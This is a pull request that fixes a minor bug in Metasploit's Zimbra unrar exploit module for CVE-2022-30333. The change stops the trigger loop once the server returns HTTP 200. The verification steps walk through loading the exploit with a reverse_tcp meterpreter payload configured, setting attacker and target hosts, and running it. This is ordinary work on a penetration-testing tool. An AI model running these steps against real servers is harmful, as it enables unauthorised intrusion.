### PR TITLE
End the session when an HTTP/200 is received

### DIFF
--- a/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Generate an on-system filename using datastore options
   def generate_target_filename
     if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')
-      print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
+      print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')
     end
 
     File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")
@@ -165,6 +165,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
       unless res
         fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')
+      end
+
+      # Break when the file successfully appears
+      if res.code == 200
+        print_good('Successfully triggered the payload')
+        break
       end
 
       Rex::ThreadSafe.sleep(interval)


### PR DESCRIPTION
Pretty simple fix for https://github.com/rapid7/metasploit-framework/issues/16917

## Verification

```
msf6 > use exploit/linux/http/zimbra_unrar_cve_2022_30333
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set RHOST 10.0.0.154
RHOST => 10.0.0.154
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set PAYLOAD payload/linux/x64/exec
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > set CMD "sleep 10000"
CMD => sleep 10000
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit
```

And ensure `sleep 10000` doesn't happen multiple times